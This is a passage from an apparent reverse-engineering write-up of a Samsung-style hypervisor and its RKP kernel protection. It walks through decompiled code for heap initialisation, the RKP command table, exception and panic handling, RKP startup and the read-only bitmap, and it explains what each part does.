  uh_log('L', "main.c", 288, "[+] Dynamic heap initialized base: %lx, size: %lx", dynamic_heap_base, dynamic_heap_size);
  *base = dynamic_heap_base;
  *size = dynamic_heap_size;
  mapped_start = dynamic_heap_base;
  if ((s2_map(dynamic_heap_base, dynamic_heap_size_0, UNKN1 | WRITE | READ, &mapped_start) & 0x8000000000000000) != 0) {
    uh_log('L', "main.c", 299, "s2_map returned false, start : %p, size : %p", mapped_start, dynamic_heap_size);
    return -1;
  }
  sparsemap_init("physmap", &uh_state.phys_map, &uh_state.dynamic_regions, 0x20, 0);
  sparsemap_for_all_entries(&uh_state.phys_map, protected_ranges_add);
  sparsemap_init("ro_bitmap", &uh_state.ro_bitmap, &uh_state.dynamic_regions, 1, 0);
  sparsemap_init("dbl_bitmap", &uh_state.dbl_bitmap, &uh_state.dynamic_regions, 1, 0);
  memlist_init(&uh_state.page_allocator.list);
  memlist_add(&uh_state.page_allocator.list, dynamic_heap_base, dynamic_heap_size);
  sparsemap_init("robuf", &uh_state.page_allocator.map, &uh_state.page_allocator.list, 1, 0);
  allocate_robuf();
  regions_end_addr = memlist_get_max_addr(&uh_state.dynamic_regions);
  if ((regions_end_addr >> 33) <= 4) {
    s2_unmap(regions_end_addr, 0xA00000000 - regions_end_addr);
    s1_unmap(regions_end_addr, 0xA00000000 - regions_end_addr);
  }
  return 0;
}

The command #4, that we named initialize_dynamic_heap, is used to finalize the list of memory regions and initialize the dynamic heap allocator. S-Boot calls it once all physical memory regions have been added using the previous command. This function does multiple things (some details are still unclear to us):

it sets the PHYS_OFFSET (physical address of kernel start);
if the dynamic heap base address was given as the first argument, it will use it, otherwise it will try to find a region of memory that is big enough for it;
it removes the chosen region from the dynamic_regions memlist;
it calls dynamic_heap_initialize which like for the static heap, saves the values in global variables and initializes the list of heap chunks, similarly to the static heap allocator;
it adds the dynamic heap region to the stage 2 translation tables;
it initializes 3 sparsemaps physmap, ro_bitmap and dbl_bitmap with the dynamic_regions memlist;
it adds all the bitmap buffers of the physmap sparsemap to the protected_ranges memlist;
it initializes a new memlist called robuf_regions and adds the dynamic heap region to it;
it initializes a new sparsemap called robuf with the robuf_regions memlist;
it calls allocate_robuf which we are going to detail below;
finally it unmaps from the stage 1 and 2 the memory located between the end address of the list range of regions and 0xA00000000 (we don't know why it does that).

int64_t allocate_robuf() {
  // ...

  if (!uh_state.dynamic_heap_inited) {
    uh_log('L', "page_allocator.c", 84, "Dynamic heap needs to be initialized");
    return -1;
  }
  robuf_size = uh_state.page_allocator.robuf_size & 0xFFFFF000;
  robuf_base = dynamic_heap_alloc(uh_state.page_allocator.robuf_size & 0xFFFFF000, 0x1000);
  if (!robuf_base)
    dynamic_heap_alloc_last_chunk(&robuf_base, &robuf_size);
  if (!robuf_base) {
    uh_log('L', "page_allocator.c", 96, "Robuffer Alloc Fail");
    return -1;
  }
  if (robuf_size) {
    offset = 0;
    do {
      zero_data_cache_page(robuf_base + offset);
      offset += 0x1000;
    } while (offset < robuf_size);
  }
  return page_allocator_init(&uh_state.page_allocator, robuf_base, robuf_size);
}

allocate_robuf tries to allocate a region of robuf_size from the dynamic heap allocator that was initialized moments ago, and if that fails, it grabs the last contiguous chunk of memory available in the allocator. It then calls page_allocator_init with this memory region as argument. page_allocator_init initializes the sparsemap and everything that the page allocator will use. The page allocator/the "robuf" region, is what will be used by RKP for handing read-only pages to the kernel (for the data protection feature for example).

`APP_RKP`

The command handlers registered for APP_RKP are:

Command ID	Command Handler	Maximum Calls
0x00	`rkp_cmd_init`	0
0x01	`rkp_cmd_start`	1
0x02	`rkp_cmd_deferred_start`	1
0x03	`rkp_cmd_write_pgt1`	-
0x04	`rkp_cmd_write_pgt2`	-
0x05	`rkp_cmd_write_pgt3`	-
0x06	`rkp_cmd_emult_ttbr0`	-
0x07	`rkp_cmd_emult_ttbr1`	-
0x08	`rkp_cmd_emult_doresume`	-
0x09	`rkp_cmd_free_pgd`	-
0x0A	`rkp_cmd_new_pgd`	-
0x0B	`rkp_cmd_kaslr_mem`	0
0x0D	`rkp_cmd_jopp_init`	1
0x0E	`rkp_cmd_ropp_init`	1
0x0F	`rkp_cmd_ropp_save`	0
0x10	`rkp_cmd_ropp_reload`	-
0x11	`rkp_cmd_rkp_robuffer_alloc`	-
0x12	`rkp_cmd_rkp_robuffer_free`	-
0x13	`rkp_cmd_get_ro_bitmap`	1
0x14	`rkp_cmd_get_dbl_bitmap`	1
0x15	`rkp_cmd_get_rkp_get_buffer_bitmap`	1
0x17	`rkp_cmd_id_0x17`	-
0x18	`rkp_cmd_set_sctlr_el1`	-
0x19	`rkp_cmd_set_tcr_el1`	-
0x1A	`rkp_cmd_set_contextidr_el1`	-
0x1B	`rkp_cmd_id_0x1B`	-
0x20	`rkp_cmd_dynamic_load`	-
0x40	`rkp_cmd_cred_init`	1
0x41	`rkp_cmd_assign_ns_size`	1
0x42	`rkp_cmd_assign_cred_size`	1
0x43	`rkp_cmd_pgd_assign`	-
0x44	`rkp_cmd_cred_set_fp`	-
0x45	`rkp_cmd_cred_set_security`	-
0x46	`rkp_cmd_assign_creds`	-
0x48	`rkp_cmd_ro_free_pages`	-
0x4A	`rkp_cmd_prot_dble_map`	-
0x4B	`rkp_cmd_mark_ppt`	-
0x4E	`rkp_cmd_set_pages_ro_tsec_jar`	-
0x4F	`rkp_cmd_set_pages_ro_vfsmnt_jar`	-
0x50	`rkp_cmd_set_pages_ro_cred_jar`	-
0x51	`rkp_cmd_id_0x51`	1
0x52	`rkp_cmd_init_ns`	-
0x53	`rkp_cmd_ns_set_root_sb`	-
0x54	`rkp_cmd_ns_set_flags`	-
0x55	`rkp_cmd_ns_set_data`	-
0x56	`rkp_cmd_ns_set_sys_vfsmnt`	5
0x57	`rkp_cmd_id_0x57`	-
0x60	`rkp_cmd_selinux_initialized`	-
0x81	`rkp_cmd_test_get_par`	0
0x82	`rkp_cmd_test_get_wxn`	0
0x83	`rkp_cmd_test_ro_range`	0
0x84	`rkp_cmd_test_get_va_xn`	0
0x85	`rkp_check_vmm_unmapped`	0
0x86	`rkp_cmd_test_ro`	0
0x87	`rkp_cmd_id_0x87`	0
0x88	`rkp_cmd_check_splintering_point`	0
0x89	`rkp_cmd_id_0x89`	0

Let's take a look at command #0 called during startup by uH.

int64_t rkp_cmd_init() {
  rkp_panic_on_violation = 1;
  rkp_init_cmd_counts();
  cs_init(&rkp_start_lock);
  return 0;
}

The command #0 handler of APP_RKP is also really simple. It set the maximal number of times a command can be called (enforced by the "checker" function) by calling rkp_init_cmd_counts and initializes the critical section that will be used by the "start" and "deferred start" commands (more on that later).

Exception Handling

An important part of a hypervisor is its exception handling code. These handling functions are going to be called on invalid memory accesses by the kernel, when the kernel executes an HVC instruction, etc. They can be found by looking at the vector table specified in the VBAR_EL2 register. We have seen in vmm_init that the vector table is at vmm_vector_table. From the ARMv8 specifications, it has the following structure:

Address	Exception Type	Description
+0x000	Synchronous	Current EL with SP0
+0x080	IRQ/vIRQ
+0x100	FIQ/vFIQ
+0x180	SError/vSError
+0x200	Synchronous	Current EL with SPx
+0x280	IRQ/vIRQ
+0x300	FIQ/vFIQ
+0x380	SError/vSError
+0x400	Synchronous	Lower EL using AArch64
+0x480	IRQ/vIRQ
+0x500	FIQ/vFIQ
+0x580	SError/vSError
+0x600	Synchronous	Lower EL using AArch32
+0x680	IRQ/vIRQ
+0x700	FIQ/vFIQ
+0x780	SError/vSError

Our device has a 64-bit kernel executing at EL1, so the commands dispatch will be in the exception handler at vmm_vector_table+0x400, but all the handlers end up calling the same function anyway:

void exception_handler(...) {
  // ...

  // Save registers x0 to x30, sp_el1, elr_el2, spsr_el2
  // ...
  vmm_dispatch(<level>, <type>, &regs);
  asm("clrex");
  asm("eret");
}

vmm_dispatch is given as arguments the level and type of the exception that has been taken.

int64_t vmm_dispatch(int64_t level, int64_t type, saved_regs_t* regs) {
  // ...

  if (has_panicked)
    vmm_panic(level, type, regs, "panic on another core");
  switch (type) {
    case 0x0:
      if (vmm_synchronous_handler(level, type, regs))
        vmm_panic(level, type, regs, "syncronous handler failed");
      break;
    case 0x80:
      uh_log('D', "vmm.c", 1132, "RKP_e3b85960");
      break;
    case 0x100:
      uh_log('D', "vmm.c", 1135, "RKP_6d732e0a");
      break;
    case 0x180:
      uh_log('D', "vmm.c", 1149, "RKP_3c71de0a");
      break;
    default:
      return 0;
  }
  return 0;
}

vmm_dispatch, in the case of synchronous exception, will call vmm_synchronous_handler.

int64_t vmm_synchronous_handler(int64_t level, int64_t type, saved_regs_t* regs) {
  // ...

  esr_el2 = get_esr_el2();
  switch (esr_el2 >> 26) {
    case 0x12: /* HVC instruction execution in AArch32 state */
    case 0x16: /* HVC instruction execution in AArch64 state */
      if ((regs->x0 & 0xFFFFF000) == 0xC300C000) {
        cmd_id = regs->x1;
        app_id = regs->x0;
        cpu_num = get_current_cpu();
        if (cpu_num <= 7)
          uh_state.injections[cpu_num] = 0;
        uh_handle_command(app_id, cmd_id, regs);
      }
      return 0;
    case 0x18: /* Trapped MSR, MRS or Sys. ins. execution in AArch64 state */
      if ((esr_el2 & 1) == 0 && !other_msr_mrs_system(&regs->x0, esr_el2_1 & 0x1FFFFFF))
        return 0;
      vmm_panic(level, type, regs, "other_msr_mrs_system failure");
      return 0;
    case 0x20: /* Instruction Abort from a lower EL */
      cs_enter(&s2_lock);
      el1_va_to_ipa(get_elr_el2(), &ipa);
      get_s2_1gb_page(ipa, &fld);
      print_s2_fld(fld);
      if ((fld & 3) == 3) {
        get_s2_2mb_page(ipa, &sld);
        print_s2_sld(sld);
        if ((sld & 3) == 3) {
          get_s2_4kb_page(ipa, &tld);
          print_s2_tld(tld);
        }
      }
      cs_exit(&s2_lock);
      if (should_skip_prefetch_abort() == 1)
        return 0;
      if (!esr_ec_prefetch_abort_from_a_lower_exception_level("-snip-")) {
        print_vmm_registers(regs);
        return 0;
      }
      vmm_panic(level, type, regs, "esr_ec_prefetch_abort_from_a_lower_exception_level");
      return 0;
    case 0x21: /* Instruction Abort taken without a change in EL */
      uh_log('L', "vmm.c", 920, "esr abort iss: 0x%x", esr_el2 & 0x1FFFFFF);
      vmm_panic(level, type, regs, "esr_ec_prefetch_abort_taken_without_a_change_in_exception_level");
    case 0x24: /* Data Abort from a lower EL */
      if (!rkp_fault(regs))
        return 0;
      if ((esr_el2 & 0x3F) == 7)  // Translation fault, level 3
      {
        va = rkp_get_va(get_hpfar_el2() << 8);
        cs_enter(&s2_lock);
        res = el1_va_to_pa(va, &ipa);
        if (!res) {
          uh_log('L', "vmm.c", 994, "Skipped data abort va: %p, ipa: %p", va, ipa);
          cs_exit(&s2_lock);
          return 0;
        }
        cs_exit(&s2_lock);
      }
      if ((esr_el2 & 0x7C) == 76)  // Permission fault, any level
      {
        va = rkp_get_va(get_hpfar_el2() << 8);
        at_s12e1w(va);
        if ((get_par_el1() & 1) == 0) {
          print_el2_state();
          invalidate_entire_s1_s2_el1_tlb();
          return 0;
        }
      }
      el1_va_to_ipa(get_elr_el2(), &ipa);
      get_s2_1gb_page(ipa, &fld);
      print_s2_fld(fld);
      if ((fld & 3) == 3) {
        get_s2_2mb_page(ipa, &sld);
        print_s2_sld(sld);
        if ((sld & 3) == 3) {
          get_s2_4kb_page(ipa, &tld);
          print_s2_tld(tld);
        }
      }
      if (esr_ec_prefetch_abort_from_a_lower_exception_level("-snip-"))
        vmm_panic(level, type, regs, "esr_ec_data_abort_from_a_lower_exception_level");
      else
        print_vmm_registers(regs);
      return 0;
    case 0x25: /* Data Abort taken without a change in EL */
      vmm_panic(level, type, regs, "esr_ec_data_abort_taken_without_a_change_in_exception_level");
      return 0;
    default:
      return -1;
  }
}

vmm_synchronous_handler first get the exception class by reading the ESR_EL2 register.

if it is an HVC instruction executed in an AArch32 or AArch64 state, it calls the uh_handle_command function with the app_id in X0 and cmd_id in X1;
if it is a trapped system register access in AArch64 state, and if it was a write, then it calls the other_msr_mrs_system function with the register that was being written to;
- other_msr_mrs_system gets the value that was being written from the saved registers;
- depending on which register was being written to, it either calls uh_panic if the register is not allowed to be written to, or checks if the new value is valid (if specific bits have a fixed value);
- it updates the ELR_EL2 register to make it point to the next instruction.
if it is an instruction abort from a lower exception level;
- it calls should_skip_prefetch_abort;
  - if IFSC==0b000111 (Translation fault, level 3) && S1PTW==1 (Fault on the stage 2 translation) && EA==0 (not an External Abort) && FnV=0b0 (FAR is valid) && SET=0b00 (Recoverable state)
  - and if the number of prefect abort skipped is less than 9;
  - then should_skip_prefetch_abort returns 1, otherwise it return 0.
- if it isn't skipped, then it calls esr_ec_prefetch_abort_from_a_lower_exception_level;
  - the function checks if the fault address is 0;
  - if it is, then it injects the fault back into EL1;
  - it also logs the CPU number into the injections array of uh_state;
  - if the address was not 0, it panics.
it is a data abort from a lower exception level;
- it calls rkp_fault to detect RKP faults;
  - the faulting instruction must be in kernel text;
  - the faulting instruction must be str x2, [x1];
  - x1 must point to a page table entry;
    - if it is a level 1 PTE, call rkp_l1pgt_write;
    - if it is a level 2 PTE, call rkp_l2pgt_write;
    - if it is a level 3 PTE, call rkp_l3pgt_write.
  - advance the PC to the next instruction and return.
- if not an RKP fault, it check the data fault status code;
  - if DFSC==0b000111 (Translation fault, level 3);
    - but it can translate s12e1(r|w) the faulting address, don't panic.
  - if DFSC==0b0011xx (Permission fault, any level);
    - but it can translate s12e1w the faulting address, invalidate TLBs.
  - otherwise, call esr_ec_prefetch_abort_from_a_lower_exception_level;
    - does the same as above, inject into EL1 is 0, panic otherwise.
if it is an instruction abort or a data abort from EL2, it panics.

crit_sec_t* vmm_panic(int64_t level, int64_t type, saved_regs_t* regs, char* message) {
  // ...

  uh_log('L', "vmm.c", 1171, ">>vmm_panic<<");
  cs_enter(&panic_cs);
  uh_log('L', "vmm.c", 1175, "message: %s", message);
  switch (level) {
    case 0x0:
      uh_log('L', "vmm.c", 1179, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_CURRENT_WITH_SP_EL0");
      break;
    case 0x200:
      uh_log('L', "vmm.c", 1182, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_CURRENT_WITH_SP_ELX");
      break;
    case 0x400:
      uh_log('L', "vmm.c", 1185, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_LOWER_USING_AARCH64");
      break;
    case 0x600:
      uh_log('L', "vmm.c", 1188, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_LOWER_USING_AARCH32");
      break;
    default:
      uh_log('L', "vmm.c", 1191, "level: VMM_UNKNOWN\n");
      break;
  }
  switch (type) {
    case 0x0:
      uh_log('L', "vmm.c", 1197, "type: VMM_EXCEPTION_TYPE_SYNCHRONOUS");
      break;
    case 0x80:
      uh_log('L', "vmm.c", 1200, "type: VMM_EXCEPTION_TYPE_IRQ_OR_VIRQ");
      break;
    case 0x100:
      uh_log('L', "vmm.c", 1203, "type: VMM_SYSCALL\n");
      break;
    case 0x180:
      uh_log('L', "vmm.c", 1206, "type: VMM_EXCEPTION_TYPE_SERROR_OR_VSERROR");
      break;
    default:
      uh_log('L', "vmm.c", 1209, "type: VMM_UNKNOWN\n");
      break;
  }
  print_vmm_registers(regs);
  if ((get_sctlr_el1() & 1) == 0 || type != 0 || (level == 0 || level == 0x200)) {
    has_panicked = 1;
    cs_exit(&panic_cs);
    if (!strcmp(message, "panic on another core"))
      exynos_reset(0x8800);
    uh_panic();
  }
  uh_panic_el1(uh_state.fault_handler, regs);
  return cs_exit(&panic_cs);
}

vmm_panic logs the panic message, exception level and type, and if either

the MMU is disabled;
the exception is not synchronous;
the exception is taken from EL2;

then it calls uh_panic, otherwise it calls uh_panic_el1.

void uh_panic() {
  uh_log('L', "main.c", 482, "uh panic!");
  print_state_and_reset();
}

void print_state_and_reset() {
  uh_log('L', "panic.c", 29, "count state - page_ro: %lx, page_free: %lx, s2_breakdown: %lx", page_ro, page_free,
         s2_breakdown);
  print_el2_state();
  print_el1_state();
  print_stack_contents();
  bigdata_store_data();
  has_panicked = 1;
  exynos_reset(0x8800);
}

uh_panic logs the EL1 and EL2 system registers values, hypervisor and kernel stacks contents, copies a textual version of those into the "bigdata" region, and then reboots the device.

int64_t uh_panic_el1(uh_handler_list_t* fault_handler, saved_regs_t* regs) {
  // ...

  uh_log('L', "vmm.c", 111, ">>uh_panic_el1<<");
  if (!fault_handler) {
    uh_log('L', "vmm.c", 113, "uH handler did not registered");
    uh_panic();
  }
  print_el2_state();
  print_el1_state();
  print_stack_contents();
  cpu_num = get_current_cpu();
  if (cpu_num <= 7) {
    something = cpu_num - 0x21530000;
    if (uh_state.injections[cpu_num] == something)
      uh_log('D', "vmm.c", 99, "Injection locked");
    uh_state.injections[cpu_num] = something;
  }
  handler_data = &fault_handler->uh_handler_data[cpu_num];
  handler_data->esr_el2 = get_esr_el2();
  handler_data->elr_el2 = get_elr_el2();
  handler_data->hcr_el2 = get_hcr_el2();
  handler_data->far_el2 = get_far_el2();
  handler_data->hpfar_el2 = get_hpfar_el2() << 8;
  if (regs)
    memcpy(fault_handler->uh_handler_data[cpu_num].regs.regs, regs, 272);
  set_elr_el2(fault_handler->uh_handler);
  return 0;
}

uh_panic_el1 fills the structure that was specified in the command #0 of APP_INIT that we have just seen. It also sets ELR_EL2 to the handler function so that it will be called upon executing the ERET instruction.

Digging Into RKP

Startup

RKP startup is performed in two stages using two different commands:

command #1 (start): called by the kernel in start_kernel, right after mm_init;
command #2 (deferred start): called by the kernel in kernel_init, right before starting init.

RKP Start

On the kernel side, this command is called in rkp_init, still in init/main.c.

rkp_init_t rkp_init_data __rkp_ro = {
    .magic = RKP_INIT_MAGIC,
    .vmalloc_start = VMALLOC_START,
    .no_fimc_verify = 0,
    .fimc_phys_addr = 0,
    ._text = (u64)_text,
    ._etext = (u64)_etext,
    ._srodata = (u64)__start_rodata,
    ._erodata = (u64)__end_rodata,
     .large_memory = 0,
};

static void __init rkp_init(void)
{
    // ...
    rkp_init_data.vmalloc_end = (u64)high_memory;
    rkp_init_data.init_mm_pgd = (u64)__pa(swapper_pg_dir);
    rkp_init_data.id_map_pgd = (u64)__pa(idmap_pg_dir);
    rkp_init_data.tramp_pgd = (u64)__pa(tramp_pg_dir);
#ifdef CONFIG_UH_RKP_FIMC_CHECK
    rkp_init_data.no_fimc_verify = 1;
#endif
    rkp_init_data.tramp_valias = (u64)TRAMP_VALIAS;
    rkp_init_data.zero_pg_addr = (u64)__pa(empty_zero_page);
    // ...
    uh_call(UH_APP_RKP, RKP_START, (u64)&rkp_init_data, (u64)kimage_voffset, 0, 0);
}

asmlinkage __visible void __init start_kernel(void)
{
    // ...
    rkp_init();
    // ...
}

On the hypervisor side, the command handler is as follows:

int64_t rkp_cmd_start(saved_regs_t* regs) {
  // ...

  cs_enter(&rkp_start_lock);
  if (rkp_inited) {
    cs_exit(&rkp_start_lock);
    uh_log('L', "rkp.c", 133, "RKP is already started");
    return -1;
  }
  res = rkp_start(regs);
  cs_exit(&rkp_start_lock);
  return res;
}

rkp_cmd_start calls rkp_start which does the real work.

int64_t rkp_start(saved_regs_t* regs) {
  // ...

  KIMAGE_VOFFSET = regs->x3;
  rkp_init_data = rkp_get_pa(regs->x2);
  if (rkp_init_data->magic - 0x5AFE0001 >= 2) {
    uh_log('L', "rkp_init.c", 85, "RKP INIT-Bad Magic(%d), %p", regs->x2, rkp_init_data);
    return -1;
  }
  if (rkp_init_data->magic == 0x5AFE0002) {
    rkp_init_cmd_counts_test();
    rkp_test = 1;
  }
  INIT_MM_PGD = rkp_init_data->init_mm_pgd;
  ID_MAP_PGD = rkp_init_data->id_map_pgd;
  ZERO_PG_ADDR = rkp_init_data->zero_pg_addr;
  TRAMP_PGD = rkp_init_data->tramp_pgd;
  TRAMP_VALIAS = rkp_init_data->tramp_valias;
  VMALLOC_START = rkp_init_data->vmalloc_start;
  VMALLOC_END = rkp_init_data->vmalloc_end;
  TEXT = rkp_init_data->_text;
  ETEXT = rkp_init_data->_etext;
  TEXT_PA = rkp_get_pa(TEXT);
  ETEXT_PA = rkp_get_pa(ETEXT);
  SRODATA = rkp_init_data->_srodata;
  ERODATA = rkp_init_data->_erodata;
  TRAMP_PGD_PAGE = TRAMP_PGD & 0xFFFFFFFFF000;
  INIT_MM_PGD_PAGE = INIT_MM_PGD & 0xFFFFFFFFF000;
  LARGE_MEMORY = rkp_init_data->large_memory;
  page_ro = 0;
  page_free = 0;
  s2_breakdown = 0;
  pmd_allocated_by_rkp = 0;
  NO_FIMC_VERIFY = rkp_init_data->no_fimc_verify;
  if (rkp_bitmap_init() < 0) {
    uh_log('L', "rkp_init.c", 150, "Failed to init bitmap");
    return -1;
  }
  memlist_init(&executable_regions);
  memlist_set_field_14(&executable_regions);
  memlist_add(&executable_regions, TEXT, ETEXT - TEXT);
  if (TRAMP_VALIAS)
    memlist_add(&executable_regions, TRAMP_VALIAS, 0x1000);
  memlist_init(&dynamic_load_regions);
  memlist_set_field_14(&dynamic_load_regions);
  put_last_dynamic_heap_chunk_in_static_heap();
  if (rkp_paging_init() < 0) {
    uh_log('L', "rkp_init.c", 169, "rkp_pging_init fails");
    return -1;
  }
  rkp_inited = 1;
  if (rkp_l1pgt_process_table(get_ttbr0_el1() & 0xFFFFFFFFF000, 0, 1) < 0) {
    uh_log('L', "rkp_init.c", 179, "processing l1pgt fails");
    return -1;
  }
  uh_log('L', "rkp_init.c", 183, "[*] HCR_EL2: %lx, SCTLR_EL2: %lx", get_hcr_el2(), get_sctlr_el2());
  uh_log('L', "rkp_init.c", 184, "[*] VTTBR_EL2: %lx, TTBR0_EL2: %lx", get_vttbr_el2(), get_ttbr0_el2());
  uh_log('L', "rkp_init.c", 185, "[*] MAIR_EL1: %lx, MAIR_EL2: %lx", get_mair_el1(), get_mair_el2());
  uh_log('L', "rkp_init.c", 186, "RKP Activated");
  return 0;
}

Let's breakdown this function:

it saves the second argument into the global variable KIMAGE_VOFFSET;
like most command handlers that we will see, it converts its first argument rkp_init_data from a virtual address to a physical address. It does so by calling the rkp_get_pa function;
it then checks its magic field. If it is the test mode magic, then it calls rkp_init_cmd_counts_test which allows test commands 0x81-0x88 to be called an unlimited amount of times;
it saves the various fields of rkp_init_data into global variables;
it initializes a new memlist called executable_regions and adds the text section of the kernel to it, and does the same with the TRAMP_VALIAS page if provided;
it initializes a new memlist called dynamic_load_regions which is used for the "dynamic executable loading" feature of RKP (more on that at the end of the blog post);
it calls put_last_dynamic_chunk_in_heap (the end result on our device is that the static heap acquires all the unused dynamic memory and the dynamic heap doesn't have any memory left);
it calls rkp_paging_init and rkp_l1pgt_process_table that will we detail below;
it logs some EL2 system register values and returns.

int64_t rkp_paging_init() {
  // ...

  if (!TEXT || (TEXT & 0xFFF) != 0) {
    uh_log('L', "rkp_paging.c", 637, "kernel text start is not aligned, stext : %p", TEXT);
    return -1;
  }
  if (!ETEXT || (ETEXT & 0xFFF) != 0) {
    uh_log('L', "rkp_paging.c", 642, "kernel text end is not aligned, etext : %p", ETEXT);
    return -1;
  }
  if (TEXT_PA <= get_base() && ETEXT_PA > get_base())
    return -1;
  if (s2_unmap(0x87000000, 0x200000))
    return -1;
  if (rkp_phys_map_set_region(TEXT_PA, ETEXT - TEXT, TEXT) < 0) {
    uh_log('L', "rkp_paging.c", 435, "physmap set failed for kernel text");
    return -1;
  }
  if (s1_map(TEXT_PA, ETEXT - TEXT, UNKN1 | READ)) {
    uh_log('L', "rkp_paging.c", 447, "Failed to make VMM S1 range RO");
    return -1;
  }
  if (INIT_MM_PGD >= TEXT_PA && INIT_MM_PGD < ETEXT_PA && s1_map(INIT_MM_PGD, 0x1000, UNKN1 | WRITE | READ)) {
    uh_log('L', "rkp_paging.c", 454, "failed to make swapper_pg_dir RW");
    return -1;
  }
  rkp_phys_map_lock(ZERO_PG_ADDR);
  if (rkp_s2_page_change_permission(ZERO_PG_ADDR, 0, 1, 1) < 0) {
    uh_log('L', "rkp_paging.c", 462, "Failed to make executable for empty_zero_page");
    return -1;
  }
  rkp_phys_map_unlock(ZERO_PG_ADDR);
  if (rkp_set_kernel_rox(0))
    return -1;
  if (rkp_s2_range_change_permission(0x87100000, 0x87140000, 0x80, 1, 1) < 0) {
    uh_log('L', "rkp_paging.c", 667, "Failed to make UH_LOG region RO");
    return -1;
  }
  if (!uh_state.dynamic_heap_inited)
    return 0;
  if (rkp_s2_range_change_permission(uh_state.dynamic_heap_base,
                                     uh_state.dynamic_heap_base + uh_state.dynamic_heap_size, 0x80, 1, 1) < 0) {
    uh_log('L', "rkp_paging.c", 685, "Failed to make dynamic_heap region RO");
    return -1;
  }
  return 0;
}

Let's breakdown rkp_paging_init as well:

it does some sanity checks on kernel text region;
it marks the kernel text region as TEXT (name is our own) in the phys_map;
it maps the kernel text region as RO in EL2 stage 1;
it maps swapper_pg_dir as RW in EL2 stage 1;
it makes the empty_zero_page ROX in EL1 stage 2;
it calls rkp_set_kernel_rox that we will detail below;
it makes the log region ROX in EL1 stage 2;
it also makes the dynamic heap region as ROX in EL1 stage 2.

int64_t rkp_set_kernel_rox(int64_t access) {
  // ...

  erodata_pa = rkp_get_pa(ERODATA);
  if (rkp_s2_range_change_permission(TEXT_PA, erodata_pa, access, 1, 1) < 0) {
    uh_log('L', "rkp_paging.c", 392, "Failed to make Kernel range ROX");
    return -1;
  }
  if (access)
    return 0;
  if (((erodata_pa | ETEXT_PA) & 0xFFF) != 0) {
    uh_log('L', "rkp_paging.c", 158, "start or end addr is not aligned, %p - %p", ETEXT_PA, erodata_pa);
    return 0;
  }
  if (ETEXT_PA > erodata_pa) {
    uh_log('L', "rkp_paging.c", 163, "start addr is bigger than end addr %p, %p", ETEXT_PA, erodata_pa);
    return 0;
  }
  paddr = ETEXT_PA;
  while (sparsemap_set_value_addr(&uh_state.ro_bitmap, addr, 1) >= 0) {
    paddr += 0x1000;
    if (paddr >= erodata_pa)
      return 0;
    uh_log('L', "rkp_paging.c", 171, "set_pgt_bitmap fail, %p", paddr);
  }
  return 0;
}

rkp_set_kernel_rox makes the range [kernel text start; rodata end] RWX (yes, RWX as the access argument is 0, but this function will be called again later with 0x80, making it RO) in the EL1 stage 2, then it updates ro_bitmap to mark the range [kernel text end; rodata end] as RO in the ro_bitmap sparsemap.

After rkp_paging_init, rkp_start calls rkp_l1pgt_process_table to process the page tables (mainly about making the 3 levels of tables read-only). It calls this function on the value of TTBR0_EL1 register.

RKP Deferred Start

On the kernel side, this command is called in rkp_deferred_init in include/linux/rkp.h.

// from include/linux/rkp.h
static inline void rkp_deferred_init(void){
    uh_call(UH_APP_RKP, RKP_DEFERRED_START, 0, 0, 0, 0);
}

// from init/main.c
static int __ref kernel_init(void *unused)
{
    // ...
    rkp_deferred_init();
    // ...
}

On the hypervisor side, the command handler is as follows:

int64_t rkp_cmd_deferred_start() {
  return rkp_deferred_start();
}

int64_t rkp_deferred_start() {
  uh_log('L', "rkp_init.c", 193, "DEFERRED INIT START");
  if (rkp_set_kernel_rox(0x80))
    return -1;
  if (rkp_l1pgt_process_table(INIT_MM_PGD, 0x1FFFFFF, 1) < 0) {
    uh_log('L', "rkp_init.c", 198, "Failed to make l1pgt processing");
    return -1;
  }
  if (TRAMP_PGD && rkp_l1pgt_process_table(TRAMP_PGD, 0x1FFFFFF, 1) < 0) {
    uh_log('L', "rkp_init.c", 204, "Failed to make l1pgt processing");
    return -1;
  }
  rkp_deferred_inited = 1;
  uh_log('L', "rkp_init.c", 217, "DEFERRED INIT IS DONE\n");
  memory_fini();
  return 0;
}

rkp_cmd_deferred_start and rkp_deferred_start do the following:

it calls rkp_set_kernel_rox again (the first time was in the normal start) but this time with 0x80 (read-only) as an argument, so the kernel text + rodata gets marked as RO in stage 2;
it calls rkp_l1pgt_process_table on swapper_pg_dir;
it calls rkp_l1pgt_process_table on tramp_pg_dir (if set);
finally it calls memory_fini.

RKP Bitmaps

There are 3 more RKP commands there called by the kernel during startup.

Two of them are still in rkp_init in init/main.c:

// from init/main.c
sparse_bitmap_for_kernel_t* rkp_s_bitmap_ro __rkp_ro = 0;
sparse_bitmap_for_kernel_t* rkp_s_bitmap_dbl __rkp_ro = 0;

static void __init rkp_init(void)
{
    // ...
    rkp_s_bitmap_ro = (sparse_bitmap_for_kernel_t *)
        uh_call(UH_APP_RKP, RKP_GET_RO_BITMAP, 0, 0, 0, 0);
    rkp_s_bitmap_dbl = (sparse_bitmap_for_kernel_t *)
        uh_call(UH_APP_RKP, RKP_GET_DBL_BITMAP, 0, 0, 0, 0);
    // ...
}

// from include/linux/rkp.h
typedef struct sparse_bitmap_for_kernel {
    u64 start_addr;
    u64 end_addr;
    u64 maxn;
    char **map;
} sparse_bitmap_for_kernel_t;

static inline u8 rkp_is_pg_protected(u64 va){
    return rkp_check_bitmap(__pa(va), rkp_s_bitmap_ro);
}

static inline u8 rkp_is_pg_dbl_mapped(u64 pa){
    return rkp_check_bitmap(pa, rkp_s_bitmap_dbl);
}

Let's take a look at the command handler for RKP_GET_RO_BITMAP.

int64_t rkp_cmd_get_ro_bitmap(saved_regs_t* regs) {
  // ...

  if (rkp_deferred_inited)
    return -1;
  bitmap = dynamic_heap_alloc(0x20, 0);
  if (!bitmap) {
    uh_log('L', "rkp.c", 302, "Fail alloc robitmap for kernel");
    return -1;
  }
  memset(bitmap, 0, sizeof(sparse_bitmap_for_kernel_t));
  res = sparsemap_bitmap_kernel(&uh_state.ro_bitmap, bitmap);
  if (res) {
    uh_log('L', "rkp.c", 309, "Fail sparse_map_bitmap_kernel");
    return res;
  }
  regs->x0 = rkp_get_va(bitmap);
  if (regs->x2)
    *virt_to_phys_el1(regs->x2) = regs->x0;
  uh_log('L', "rkp.c", 322, "robitmap:%p", bitmap);
  return 0;
}

